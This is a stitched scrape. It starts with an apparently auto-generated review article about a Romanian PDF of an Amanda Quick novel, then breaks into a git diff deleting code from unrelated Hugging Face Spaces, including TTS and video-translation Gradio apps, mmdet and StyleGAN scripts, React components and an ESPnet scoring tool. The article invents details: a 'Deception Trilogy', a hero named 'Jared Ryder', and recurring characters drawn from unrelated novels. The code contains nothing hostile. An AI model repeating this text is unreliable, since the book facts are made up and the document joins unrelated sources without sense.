      The setting reflects the historical context of the time period: England was recovering from the Napoleonic Wars that had ended earlier that year; social classes were rigidly defined by birth; women had limited rights; Gothic novels Continuing the article:

      The themes

      -

      The themes of Capcanele Iubirii Amanda Quick Pdf 21 are typical of the Gothic genre, which was popular in Regency England. Some of the themes are:

      -
        -
      • Secrets and mysteries: The book is full of secrets and mysteries that the characters have to uncover, such as Olympia's family history, Jared's spy mission, Stonegate's treasure, and Lord Delbridge's motives.
      • -
      • Romance and passion: The book is also a love story between Olympia and Jared, who overcome their initial distrust and differences to form a strong bond based on mutual respect and desire.
      • -
      • Danger and suspense: The book creates a sense of danger and suspense by putting the characters in perilous situations, such as being attacked by thugs, trapped in hidden rooms, or confronted by a villain.
      • -
      • Supernatural and occult: The book incorporates elements of the supernatural and occult, such as ghosts, curses, ancient artifacts, and fire magic.
      • -
      -

      Analysis of Capcanele Iubirii Amanda Quick Pdf 21

      -

      After summarizing the book, let us now analyze its strengths and weaknesses, and compare it with the previous parts of the trilogy.

      -

      The strengths

      -

      Some of the strengths of Capcanele Iubirii Amanda Quick Pdf 21 are:

      -
        -
      • The characters: The book has well-developed and likable characters who have distinct personalities and backgrounds. Olympia is a strong and independent heroine who does not conform to the expectations of society. Jared is a mysterious and courageous hero who has a sense of honor and duty. They have a good chemistry and banter that makes their relationship believable and enjoyable.
      • -
      • The plot: The book has an engaging and fast-paced plot that keeps the reader interested and entertained. The book combines romance, mystery, adventure, and humor in a balanced way. The book also has some twists and surprises that add to the excitement.
      • -
      • The writing: The book has a clear and fluent writing style that suits the genre and the tone of the story. The book uses descriptive language that creates vivid images of the settings and the scenes. The book also has witty dialogue that reflects the characters' voices and emotions.
      • -
      -

      The weaknesses

      -

      Some of the weaknesses of Capcanele Iubirii Amanda Quick Pdf 21 are:

      -
        -
      • The credibility: The book has some aspects that might seem implausible or unrealistic to some readers, such as the existence of the Eye of Fire, the ease with which Olympia and Jared solve the clues, or the coincidence that they both have an interest in ancient languages.
      • -
      • The originality: The book has some elements that might seem clichéd or predictable to some readers, such as the Gothic tropes, the stereotypical villain, or the happy ending.
      • -
      • The depth: The book has some aspects that might seem superficial or underdeveloped to some readers, such as the historical context, the secondary characters, or the themes.
      • -
      -

      The comparison with the previous parts

      -

      Capcanele Iubirii Amanda Quick Pdf 21 is the final part of the Deception Trilogy, which also includes Surrender and Scandal. Each book can be read as a standalone, but they are connected by recurring characters and themes. Some of the similarities and differences between them are:

      - - - - - -
      BookHeroineHeroMysterySetting
      SurrenderVictoria HuntingtonLucas ColebrookA stolen necklaceA country estate
      ScandalEmily FaringdonSimon TraherneA family feudA castle in Wales
      DeceptionOlympia WingfieldJared RyderA hidden treasureA mansion in Cornwall
      -

      All three books have similar themes of secrets, romance, danger, and supernatural. However, each book has its own tone and style. Surrender is more sensual and emotional; Scandal is more humorous and playful; Deception is more adventurous and thrilling.

      -

      Conclusion

      -

      In conclusion, Capcanele Iubirii Amanda Quick Pdf 21 is a historical romance novel that concludes the Deception Trilogy by Amanda Quick. It tells the story of Olympia Wingfield, a spinster who inherits a haunted mansion and a spy guardian named Jared Ryder. Together, they solve the mystery of Stonegate's treasure and fall in love.

      -

      The main points

      -

      The main points of this article are:

      -
        -
      • Capcanele Iubirii Amanda Quick Pdf 21 is a historical romance novel set in Regency England that is part of the Deception Trilogy by Amanda Quick.
      • -
      • The book follows Olympia Wingfield and Jared Ryder as they explore Stonegate mansion and discover its secret treasure: an ancient jewel called the Eye of Fire.
      • -
      • The book has elements of Gothic fiction such as secrets, mysteries, romance, danger, suspense, supernatural, occult.
      • -
      • The book has strengths such as well-developed characters; engaging plot; clear writing; weaknesses such as lack of credibility; originality; depth; comparison with previous parts such as similar themes but different tones.
      • -
      -

      The recommendation

      -

      We recommend this book to readers who enjoy historical romance novels with a touch of mystery Continuing the article:

      The final verdict

      -

      Capcanele Iubirii Amanda Quick Pdf 21 is a satisfying and entertaining conclusion to the Deception Trilogy by Amanda Quick. It is a book that will appeal to fans of historical romance and Gothic fiction who are looking for a fun and exciting read.

      -

      FAQs

      -

      Here are some frequently asked questions about Capcanele Iubirii Amanda Quick Pdf 21:

      -
        -
      1. Where can I find Capcanele Iubirii Amanda Quick Pdf 21 online?
      2. -

        You can find Capcanele Iubirii Amanda Quick Pdf 21 online as a PDF file on Scribd. You can also find the original English version Deception on Amazon or other online bookstores.

        -
      3. Who are the other recurring characters in the Deception Trilogy?
      4. -

        Some of the other recurring characters in the Deception Trilogy are: Anthony Stalbridge and Louisa Bryce from The River Knows; Tobias March and Lavinia Lake from Slightly Shady; and Sebastian Fleetwood and Evangeline Stone from Late for the Wedding. They are all friends or relatives of the main couples in the trilogy.

        -
      5. What are some other books by Amanda Quick that are similar to Capcanele Iubirii Amanda Quick Pdf 21?
      6. -

        Some other books by Amanda Quick that are similar to Capcanele Iubirii Amanda Quick Pdf 21 are: Ravished, Rendezvous, Dangerous, Mistress, Affair, Mischief, Wicked Widow, The Paid Companion, The Perfect Poison, The Mystery Woman, and Garden of Lies. They are all historical romance novels with elements of mystery and suspense.

        -
      7. What are some other authors who write historical romance novels with elements of Gothic fiction?
      8. -

        Some other authors who write historical romance novels with elements of Gothic fiction are: Mary Jo Putney, Victoria Holt, Barbara Michaels, Anne Stuart, Elizabeth Peters, Lauren Willig, Deanna Raybourn, and Simone St. James.

        -
      9. What are some other genres that Amanda Quick writes under other pseudonyms?
      10. -

        Amanda Quick also writes contemporary romance novels under her real name Jayne Ann Krentz; paranormal romance novels under the name Jayne Castle; and romantic suspense novels under the name Jayne Taylor.

        -
      -

      0a6ba089eb
      -
      -
      \ No newline at end of file diff --git a/spaces/rahul999r/Rahul_Kannada_TTS/app.py b/spaces/rahul999r/Rahul_Kannada_TTS/app.py deleted file mode 100644 index 3e1d4a83202b2fe13c69bd5581f476d2bc7a2d4a..0000000000000000000000000000000000000000 --- a/spaces/rahul999r/Rahul_Kannada_TTS/app.py +++ /dev/null @@ -1,45 +0,0 @@ -from tts_infer.tts import TextToMel, MelToWav -from tts_infer.transliterate import XlitEngine -from tts_infer.num_to_word_on_sent import normalize_nums - -import re -from scipy.io.wavfile import write - -device = 'cpu' - -mel_to_wav = MelToWav(hifi_model_dir='tts_infer/translit_models1/ma_fe_hifi', device=device) - -def tts(text,gender): - lang = 'kn' - if gender == 'Female': - text_to_mel = TextToMel(glow_model_dir='tts_infer/translit_models1/fe_glow', device=device) - else : - text_to_mel = TextToMel(glow_model_dir='tts_infer/translit_models1/ma_glow', device=device) - text_num_to_word = normalize_nums(text, lang) # converting numbers to words in lang - #text_num_to_word_and_transliterated = translit(text_num_to_word, lang) # transliterating english words to lang - - mel = text_to_mel.generate_mel(text_num_to_word) - audio, sr = mel_to_wav.generate_wav(mel) - #write(filename='temp.wav', rate=sr, data=audio) # for saving wav file, if needed - return (sr, audio) - -import gradio as gr - -# Define the function to generate audio and save it as a WAV file. -def generate_audio(text,gender): - lang = 'kn' # Language code for Kannada - sr, audio = tts(text, gender) - return (sr, audio) - -iface = gr.Interface( - fn=generate_audio, - inputs=[ - gr.components.Textbox(label="Enter Text in Kannada"), - gr.components.Radio(["Male", "Female"], label="Gender") - ], - outputs=[ - gr.Audio(label="Audio") - ] - ) - -iface.launch() \ No newline at end of file diff --git a/spaces/rajeshradhakrishnan/english-malayalam/static/index.html b/spaces/rajeshradhakrishnan/english-malayalam/static/index.html deleted file mode 100644 index d136bb39becb016a7940e0500721da9aa25bea6a..0000000000000000000000000000000000000000 --- a/spaces/rajeshradhakrishnan/english-malayalam/static/index.html +++ /dev/null @@ -1,32 +0,0 @@ - - - - - JavaScipt Open Assistant Clone - - - - - -
      -

      മലയാളം - Open Assistant

      -

      -
      -
      - -
      -
      -
      -

      Open Assistant - This is the 4th iteration English - supervised-fine-tuning (SFT) model of the Open-Assistant project. -

      -
      - - - \ No newline at end of file diff --git a/spaces/rajistics/call-sentiment-demo2/README.md b/spaces/rajistics/call-sentiment-demo2/README.md deleted file mode 100644 index 82884ec6e7d9f87a9e1681d8978df13731f762af..0000000000000000000000000000000000000000 --- a/spaces/rajistics/call-sentiment-demo2/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Call Sentiment Blocks 2 -emoji: 🐠 -colorFrom: blue -colorTo: green -sdk: gradio -sdk_version: 3.11.0 -app_file: app.py -pinned: false -duplicated_from: enoreyes/call-sentiment-demo ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/reach-vb/music-spectrogram-diffusion/README.md b/spaces/reach-vb/music-spectrogram-diffusion/README.md deleted file mode 100644 index 434952ff57167da6274f0a09727d0038f3d79746..0000000000000000000000000000000000000000 --- a/spaces/reach-vb/music-spectrogram-diffusion/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Music Spectrogram Diffusion -emoji: 🔊 -colorFrom: blue -colorTo: indigo -sdk: gradio -sdk_version: 3.23.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/datasets/pipelines/compose.py b/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/datasets/pipelines/compose.py deleted file mode 100644 index d759220098440c769b8f53c1e3b902c046450ff4..0000000000000000000000000000000000000000 --- a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/datasets/pipelines/compose.py +++ /dev/null @@ -1,55 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import collections - -from mmcv.utils import build_from_cfg - -from ..builder import PIPELINES - - -@PIPELINES.register_module() -class Compose: - """Compose multiple transforms sequentially. - - Args: - transforms (Sequence[dict | callable]): Sequence of transform object or - config dict to be composed. - """ - - def __init__(self, transforms): - assert isinstance(transforms, collections.abc.Sequence) - self.transforms = [] - for transform in transforms: - if isinstance(transform, dict): - transform = build_from_cfg(transform, PIPELINES) - self.transforms.append(transform) - elif callable(transform): - self.transforms.append(transform) - else: - raise TypeError('transform must be callable or a dict') - - def __call__(self, data): - """Call function to apply transforms sequentially. - - Args: - data (dict): A result dict contains the data to transform. - - Returns: - dict: Transformed data. - """ - - for t in self.transforms: - data = t(data) - if data is None: - return None - return data - - def __repr__(self): - format_string = self.__class__.__name__ + '(' - for t in self.transforms: - str_ = t.__repr__() - if 'Compose(' in str_: - str_ = str_.replace('\n', '\n ') - format_string += '\n' - format_string += f' {str_}' - format_string += '\n)' - return format_string diff --git a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/fast_rcnn.py b/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/fast_rcnn.py deleted file mode 100644 index 7aebe151feb22354573b7b06675e15be3f610fe6..0000000000000000000000000000000000000000 --- a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/fast_rcnn.py +++ /dev/null @@ -1,55 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from ..builder import DETECTORS -from .two_stage import TwoStageDetector - - -@DETECTORS.register_module() -class FastRCNN(TwoStageDetector): - """Implementation of `Fast R-CNN `_""" - - def __init__(self, - backbone, - roi_head, - train_cfg, - test_cfg, - neck=None, - pretrained=None, - init_cfg=None): - super(FastRCNN, self).__init__( - backbone=backbone, - neck=neck, - roi_head=roi_head, - train_cfg=train_cfg, - test_cfg=test_cfg, - pretrained=pretrained, - init_cfg=init_cfg) - - def forward_test(self, imgs, img_metas, proposals, **kwargs): - """ - Args: - imgs (List[Tensor]): the outer list indicates test-time - augmentations and inner Tensor should have a shape NxCxHxW, - which contains all images in the batch. - img_metas (List[List[dict]]): the outer list indicates test-time - augs (multiscale, flip, etc.) and the inner list indicates - images in a batch. - proposals (List[List[Tensor]]): the outer list indicates test-time - augs (multiscale, flip, etc.) and the inner list indicates - images in a batch. The Tensor should have a shape Px4, where - P is the number of proposals. - """ - for var, name in [(imgs, 'imgs'), (img_metas, 'img_metas')]: - if not isinstance(var, list): - raise TypeError(f'{name} must be a list, but got {type(var)}') - - num_augs = len(imgs) - if num_augs != len(img_metas): - raise ValueError(f'num of augmentations ({len(imgs)}) ' - f'!= num of image meta ({len(img_metas)})') - - if num_augs == 1: - return self.simple_test(imgs[0], img_metas[0], proposals[0], - **kwargs) - else: - # TODO: support test-time augmentation - assert NotImplementedError diff --git a/spaces/rorallitri/biomedical-language-models/logs/HD Online Player (The Chronicles Of Narnia 4 The Silve) __TOP__.md b/spaces/rorallitri/biomedical-language-models/logs/HD Online Player (The Chronicles Of Narnia 4 The Silve) __TOP__.md deleted file mode 100644 index 96ec4f3a5262dfcaa91175a4c275d650e4b31ef5..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/HD Online Player (The Chronicles Of Narnia 4 The Silve) __TOP__.md +++ /dev/null @@ -1,6 +0,0 @@ -

      HD Online Player (The Chronicles Of Narnia 4 The Silve)


      Download File » https://tinurll.com/2uzoBt



      -
      - 4d29de3e1b
      -
      -
      -

      diff --git a/spaces/rubensmau/Dov_Tzamir/data_driven_characters/constants.py b/spaces/rubensmau/Dov_Tzamir/data_driven_characters/constants.py deleted file mode 100644 index 70fc07130755bdf97285afa43ec9284604acf1d3..0000000000000000000000000000000000000000 --- a/spaces/rubensmau/Dov_Tzamir/data_driven_characters/constants.py +++ /dev/null @@ -1,2 +0,0 @@ -DATA_ROOT = "data" -VERBOSE = True diff --git a/spaces/ruslanmv/Video-Translator/app.py b/spaces/ruslanmv/Video-Translator/app.py deleted file mode 100644 index 2ecdcd8c78638c3613ac928fda86b60c469207c2..0000000000000000000000000000000000000000 --- a/spaces/ruslanmv/Video-Translator/app.py +++ /dev/null @@ -1,93 +0,0 @@ -# coding=utf8 -from gtts import gTTS -import gradio as gr -import os -import speech_recognition as sr -from googletrans import Translator, constants -from pprint import pprint -from moviepy.editor import * -def video_to_translate(file_obj,initial_language,final_language): -# Insert Local Video File Path - videoclip = VideoFileClip(file_obj.name) - # Insert Local Audio File Path - videoclip.audio.write_audiofile("test.wav",codec='pcm_s16le') -# initialize the recognizer - r = sr.Recognizer() - - if initial_language == "English": - lang_in='en-US' - elif initial_language == "Italian": - lang_in='it-IT' - elif initial_language == "Spanish": - lang_in='es-MX' - elif initial_language == "Russian": - lang_in='ru-RU' - elif initial_language == "German": - lang_in='de-DE' - elif initial_language == "Japanese": - lang_in='ja-JP' - elif initial_language == "Portuguese": - lang_in='pt-BR' - # open the file - with sr.AudioFile("test.wav") as source: - # listen for the data (load audio to memory) - audio_data = r.record(source) - # recognize (convert from speech to text) - text = r.recognize_google(audio_data, language = lang_in) - - if final_language == "English": - lang='en' - elif final_language == "Italian": - lang='it' - elif final_language == "Spanish": - lang='es' - elif final_language == "Russian": - lang='ru' - elif final_language == "German": - lang='de' - elif final_language == "Japanese": - lang='ja' - elif final_language == "Portuguese": - lang='pt' - print(lang) - # init the Google API translator - translator = Translator() - translation = translator.translate(text, dest=lang) - #translation.text - trans=translation.text - myobj = gTTS(text=trans, lang=lang, slow=False) - myobj.save("audio.wav") - # loading audio file - audioclip = AudioFileClip("audio.wav") - - # adding audio to the video clip - new_audioclip = CompositeAudioClip([audioclip]) - videoclip.audio = new_audioclip - new_video="video_translated_"+lang+".mp4" - videoclip.write_videofile(new_video) - #return 'audio.wav' - return new_video - -initial_language = gr.inputs.Dropdown(["English","Italian","Japanese","Russian","Spanish","German","Portuguese"]) -final_language = gr.inputs.Dropdown([ "Russian","Italian","Spanish","German","English","Japanese","Portuguese"]) - - -gr.Interface(fn = video_to_translate, - inputs = ['file',initial_language,final_language], - outputs = 'video', - verbose = True, - title = 'Video Translator', - description = 'A simple application that translates from English, Italian, Japanese, Russian, Spanish, Portuguese and German video files to Italian, Spanish, Russian, English , Portuguese and Japanese. Upload your own file, or click one of the examples to load them. Wait one minute to process.', - article = - '''
      -

      All you need to do is to upload the mp4 file and hit submit, then wait for compiling. After that click on Play/Pause for listing to the video. The video is saved in an mp4 format. - For more information visit ruslanmv.com -

      -
      ''', - # examples=[['obama.mp4',"English",'Spanish'], - # ['obama.mp4',"English",'Italian'], - # ['obama.mp4',"English",'German'], - # ['obama.mp4',"English",'Japanese'], - # ['obama.mp4',"English",'Portuguese'] - # ] - ).launch() \ No newline at end of file diff --git a/spaces/safi842/FashionGen/models/stylegan2/stylegan2-pytorch/prepare_data.py b/spaces/safi842/FashionGen/models/stylegan2/stylegan2-pytorch/prepare_data.py deleted file mode 100644 index db49cbda14aca3b2bc0268a4f40cd97f2dd603cc..0000000000000000000000000000000000000000 --- a/spaces/safi842/FashionGen/models/stylegan2/stylegan2-pytorch/prepare_data.py +++ /dev/null @@ -1,82 +0,0 @@ -import argparse -from io import BytesIO -import multiprocessing -from functools import partial - -from PIL import Image -import lmdb -from tqdm import tqdm -from torchvision import datasets -from torchvision.transforms import functional as trans_fn - - -def resize_and_convert(img, size, resample, quality=100): - img = trans_fn.resize(img, size, resample) - img = trans_fn.center_crop(img, size) - buffer = BytesIO() - img.save(buffer, format='jpeg', quality=quality) - val = buffer.getvalue() - - return val - - -def resize_multiple(img, sizes=(128, 256, 512, 1024), resample=Image.LANCZOS, quality=100): - imgs = [] - - for size in sizes: - imgs.append(resize_and_convert(img, size, resample, quality)) - - return imgs - - -def resize_worker(img_file, sizes, resample): - i, file = img_file - img = Image.open(file) - img = img.convert('RGB') - out = resize_multiple(img, sizes=sizes, resample=resample) - - return i, out - - -def prepare(env, dataset, n_worker, sizes=(128, 256, 512, 1024), resample=Image.LANCZOS): - resize_fn = partial(resize_worker, sizes=sizes, resample=resample) - - files = sorted(dataset.imgs, key=lambda x: x[0]) - files = [(i, file) for i, (file, label) in enumerate(files)] - total = 0 - - with multiprocessing.Pool(n_worker) as pool: - for i, imgs in tqdm(pool.imap_unordered(resize_fn, files)): - for size, img in zip(sizes, imgs): - key = f'{size}-{str(i).zfill(5)}'.encode('utf-8') - - with env.begin(write=True) as txn: - txn.put(key, img) - - total += 1 - - with env.begin(write=True) as txn: - txn.put('length'.encode('utf-8'), str(total).encode('utf-8')) - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--out', type=str) - parser.add_argument('--size', type=str, default='128,256,512,1024') - parser.add_argument('--n_worker', type=int, default=8) - parser.add_argument('--resample', type=str, default='lanczos') - parser.add_argument('path', type=str) - - args = parser.parse_args() - - resample_map = {'lanczos': Image.LANCZOS, 'bilinear': Image.BILINEAR} - resample = resample_map[args.resample] - - sizes = [int(s.strip()) for s in args.size.split(',')] - - print(f'Make dataset of image sizes:', ', '.join(str(s) for s in sizes)) - - imgset = datasets.ImageFolder(args.path) - - with lmdb.open(args.out, map_size=1024 ** 4, readahead=False) as env: - prepare(env, imgset, args.n_worker, sizes=sizes, resample=resample) diff --git a/spaces/samuelinferences/transformers-can-do-bayesian-inference/prior-fitting/positional_encodings.py b/spaces/samuelinferences/transformers-can-do-bayesian-inference/prior-fitting/positional_encodings.py deleted file mode 100644 index 05580e052d6bb1fe782441e7e65088f7989e8e0b..0000000000000000000000000000000000000000 --- a/spaces/samuelinferences/transformers-can-do-bayesian-inference/prior-fitting/positional_encodings.py +++ /dev/null @@ -1,70 +0,0 @@ -import math - -import torch -from torch import nn - - -# Protocol for positonal encodings. -# __init__(d_model, max_len=..[, more optionals]) -# forward(x: (seq_len, bs, d_model)) -> Tensor of shape (*x.shape[:2],d_model) containing pos. embeddings - - -class NoPositionalEncoding(nn.Module): - def __init__(self, d_model, max_len=None): - super(NoPositionalEncoding, self).__init__() - pass - - def forward(self, x): - return x #* math.sqrt(x.shape[-1]) - - -class PositionalEncoding(nn.Module): - def __init__(self, d_model, max_len=5000): - super(PositionalEncoding, self).__init__() - pe = torch.zeros(max_len, d_model) - position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1) - div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model)) - pe[:, 0::2] = torch.sin(position * div_term) - pe[:, 1::2] = torch.cos(position * div_term) - pe = pe.unsqueeze(0).transpose(0, 1) - self.register_buffer('pe', pe) - - def forward(self, x): - x = self.pe[:x.size(0), :] + x # * math.sqrt(x.shape[-1]) - return x - - -class LearnedPositionalEncoding(nn.Module): - def __init__(self, d_model, max_len=5000): - super(LearnedPositionalEncoding, self).__init__() - self.max_seq_len = max_len - #self.positional_embeddings = nn.Embedding(max_len, d_model) - self.positional_embeddings = nn.Parameter(torch.empty(max_len, d_model)) - nn.init.normal_(self.positional_embeddings, mean=0, std=d_model ** -0.5) - - def forward(self, x): - seq_len, bs, d_model = x.shape - assert seq_len <= len(self.positional_embeddings), 'seq_len can be at most max_len.' - pos_emb = self.positional_embeddings[:seq_len] - return pos_emb.unsqueeze(1).expand(seq_len, bs, d_model) + x #* math.sqrt(x.shape[-1]) - - -class PairedScrambledPositionalEncodings(LearnedPositionalEncoding): - # TODO check whether it is a problem to use the same perm. for full batch - def forward(self, x): - seq_len, bs, d_model = x.shape - assert seq_len <= len(self.positional_embeddings), 'seq_len can be at most max_len.' - assert len(self.positional_embeddings) % 2 == 0, 'Please specify an even max_len.' - - paired_embs = self.positional_embeddings.view(len(self.positional_embeddings), -1, 2) - pos_emb = paired_embs[torch.randperm(len(paired_embs))].view(*self.positional_embeddings.shape)[:seq_len] - - return pos_emb.unsqueeze(1).expand(seq_len, bs, d_model) + x #* math.sqrt(x.shape[-1]) - - - - - - - - diff --git a/spaces/sdhsdhk/bingo111/src/components/ui/select.tsx b/spaces/sdhsdhk/bingo111/src/components/ui/select.tsx deleted file mode 100644 index 77f12c2996f541b97663de4c9e20ab34d4ec2fac..0000000000000000000000000000000000000000 --- a/spaces/sdhsdhk/bingo111/src/components/ui/select.tsx +++ /dev/null @@ -1,123 +0,0 @@ -'use client' - -import * as React from 'react' -import * as SelectPrimitive from '@radix-ui/react-select' - -import { cn } from '@/lib/utils' -import { - IconArrowDown, - IconCheck, - IconChevronUpDown -} from '@/components/ui/icons' - -const Select = SelectPrimitive.Root - -const SelectGroup = SelectPrimitive.Group - -const SelectValue = SelectPrimitive.Value - -const SelectTrigger = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - {children} - - - - -)) -SelectTrigger.displayName = SelectPrimitive.Trigger.displayName - -const SelectContent = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, position = 'popper', ...props }, ref) => ( - - - - {children} - - - -)) -SelectContent.displayName = SelectPrimitive.Content.displayName - -const SelectLabel = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -SelectLabel.displayName = SelectPrimitive.Label.displayName - -const SelectItem = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - - - - - - {children} - -)) -SelectItem.displayName = SelectPrimitive.Item.displayName - -const SelectSeparator = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -SelectSeparator.displayName = SelectPrimitive.Separator.displayName - -export { - Select, - SelectGroup, - SelectValue, - SelectTrigger, - SelectContent, - SelectLabel, - SelectItem, - SelectSeparator -} diff --git a/spaces/sdhsdhk/bingosjj/src/components/ui/codeblock.tsx b/spaces/sdhsdhk/bingosjj/src/components/ui/codeblock.tsx deleted file mode 100644 index aabda4e3b59f4e36b6ab79feb19d8d18b70e881b..0000000000000000000000000000000000000000 --- a/spaces/sdhsdhk/bingosjj/src/components/ui/codeblock.tsx +++ /dev/null @@ -1,142 +0,0 @@ -'use client' - -import { FC, memo } from 'react' -import { Prism as SyntaxHighlighter } from 'react-syntax-highlighter' -import { coldarkDark } from 'react-syntax-highlighter/dist/cjs/styles/prism' - -import { useCopyToClipboard } from '@/lib/hooks/use-copy-to-clipboard' -import { IconCheck, IconCopy, IconDownload } from '@/components/ui/icons' -import { Button } from '@/components/ui/button' - -interface Props { - language: string - value: string -} - -interface languageMap { - [key: string]: string | undefined -} - -export const programmingLanguages: languageMap = { - javascript: '.js', - python: '.py', - java: '.java', - c: '.c', - cpp: '.cpp', - 'c++': '.cpp', - 'c#': '.cs', - ruby: '.rb', - php: '.php', - swift: '.swift', - 'objective-c': '.m', - kotlin: '.kt', - typescript: '.ts', - go: '.go', - perl: '.pl', - rust: '.rs', - scala: '.scala', - haskell: '.hs', - lua: '.lua', - shell: '.sh', - sql: '.sql', - html: '.html', - css: '.css' - // add more file extensions here, make sure the key is same as language prop in CodeBlock.tsx component -} - -export const generateRandomString = (length: number, lowercase = false) => { - const chars = 'ABCDEFGHJKLMNPQRSTUVWXY3456789' // excluding similar looking characters like Z, 2, I, 1, O, 0 - let result = '' - for (let i = 0; i < length; i++) { - result += chars.charAt(Math.floor(Math.random() * chars.length)) - } - return lowercase ? result.toLowerCase() : result -} - -const CodeBlock: FC = memo(({ language, value }) => { - const { isCopied, copyToClipboard } = useCopyToClipboard({ timeout: 2000 }) - - const downloadAsFile = () => { - if (typeof window === 'undefined') { - return - } - const fileExtension = programmingLanguages[language] || '.file' - const suggestedFileName = `file-${generateRandomString( - 3, - true - )}${fileExtension}` - const fileName = window.prompt('Enter file name' || '', suggestedFileName) - - if (!fileName) { - // User pressed cancel on prompt. - return - } - - const blob = new Blob([value], { type: 'text/plain' }) - const url = URL.createObjectURL(blob) - const link = document.createElement('a') - link.download = fileName - link.href = url - link.style.display = 'none' - document.body.appendChild(link) - link.click() - document.body.removeChild(link) - URL.revokeObjectURL(url) - } - - const onCopy = () => { - if (isCopied) return - copyToClipboard(value) - } - - return ( -
      -
      - {language} -
      - - -
      -
      - - {value} - -
      - ) -}) -CodeBlock.displayName = 'CodeBlock' - -export { CodeBlock } diff --git a/spaces/segments-tobias/conex/espnet2/bin/enh_scoring.py b/spaces/segments-tobias/conex/espnet2/bin/enh_scoring.py deleted file mode 100644 index a64a42fdb07c5bc162749422ca969fa9029ebac4..0000000000000000000000000000000000000000 --- a/spaces/segments-tobias/conex/espnet2/bin/enh_scoring.py +++ /dev/null @@ -1,149 +0,0 @@ -#!/usr/bin/env python3 -import argparse -import logging -import sys -from typing import List -from typing import Union - -from mir_eval.separation import bss_eval_sources -import numpy as np -from pystoi import stoi -import torch -from typeguard import check_argument_types - -from espnet.utils.cli_utils import get_commandline_args -from espnet2.enh.espnet_model import ESPnetEnhancementModel -from espnet2.fileio.datadir_writer import DatadirWriter -from espnet2.fileio.sound_scp import SoundScpReader -from espnet2.utils import config_argparse - - -def scoring( - output_dir: str, - dtype: str, - log_level: Union[int, str], - key_file: str, - ref_scp: List[str], - inf_scp: List[str], - ref_channel: int, -): - assert check_argument_types() - - logging.basicConfig( - level=log_level, - format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s", - ) - - assert len(ref_scp) == len(inf_scp), ref_scp - num_spk = len(ref_scp) - - keys = [ - line.rstrip().split(maxsplit=1)[0] for line in open(key_file, encoding="utf-8") - ] - - ref_readers = [SoundScpReader(f, dtype=dtype, normalize=True) for f in ref_scp] - inf_readers = [SoundScpReader(f, dtype=dtype, normalize=True) for f in inf_scp] - - # get sample rate - sample_rate, _ = ref_readers[0][keys[0]] - - # check keys - for inf_reader, ref_reader in zip(inf_readers, ref_readers): - assert inf_reader.keys() == ref_reader.keys() - - with DatadirWriter(output_dir) as writer: - for key in keys: - ref_audios = [ref_reader[key][1] for ref_reader in ref_readers] - inf_audios = [inf_reader[key][1] for inf_reader in inf_readers] - ref = np.array(ref_audios) - inf = np.array(inf_audios) - if ref.ndim > inf.ndim: - # multi-channel reference and single-channel output - ref = ref[..., ref_channel] - assert ref.shape == inf.shape, (ref.shape, inf.shape) - elif ref.ndim < inf.ndim: - # single-channel reference and multi-channel output - raise ValueError( - "Reference must be multi-channel when the \ - network output is multi-channel." - ) - elif ref.ndim == inf.ndim == 3: - # multi-channel reference and output - ref = ref[..., ref_channel] - inf = inf[..., ref_channel] - - sdr, sir, sar, perm = bss_eval_sources(ref, inf, compute_permutation=True) - - for i in range(num_spk): - stoi_score = stoi(ref[i], inf[int(perm[i])], fs_sig=sample_rate) - si_snr_score = -float( - ESPnetEnhancementModel.si_snr_loss( - torch.from_numpy(ref[i][None, ...]), - torch.from_numpy(inf[int(perm[i])][None, ...]), - ) - ) - writer[f"STOI_spk{i + 1}"][key] = str(stoi_score) - writer[f"SI_SNR_spk{i + 1}"][key] = str(si_snr_score) - writer[f"SDR_spk{i + 1}"][key] = str(sdr[i]) - writer[f"SAR_spk{i + 1}"][key] = str(sar[i]) - writer[f"SIR_spk{i + 1}"][key] = str(sir[i]) - # save permutation assigned script file - writer[f"wav_spk{i + 1}"][key] = inf_readers[perm[i]].data[key] - - -def get_parser(): - parser = config_argparse.ArgumentParser( - description="Frontend inference", - formatter_class=argparse.ArgumentDefaultsHelpFormatter, - ) - - # Note(kamo): Use '_' instead of '-' as separator. - # '-' is confusing if written in yaml. - - parser.add_argument( - "--log_level", - type=lambda x: x.upper(), - default="INFO", - choices=("CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"), - help="The verbose level of logging", - ) - - parser.add_argument("--output_dir", type=str, required=True) - - parser.add_argument( - "--dtype", - default="float32", - choices=["float16", "float32", "float64"], - help="Data type", - ) - - group = parser.add_argument_group("Input data related") - group.add_argument( - "--ref_scp", - type=str, - required=True, - action="append", - ) - group.add_argument( - "--inf_scp", - type=str, - required=True, - action="append", - ) - group.add_argument("--key_file", type=str) - group.add_argument("--ref_channel", type=int, default=0) - - return parser - - -def main(cmd=None): - print(get_commandline_args(), file=sys.stderr) - parser = get_parser() - args = parser.parse_args(cmd) - kwargs = vars(args) - kwargs.pop("config", None) - scoring(**kwargs) - - -if __name__ == "__main__": - main() diff --git 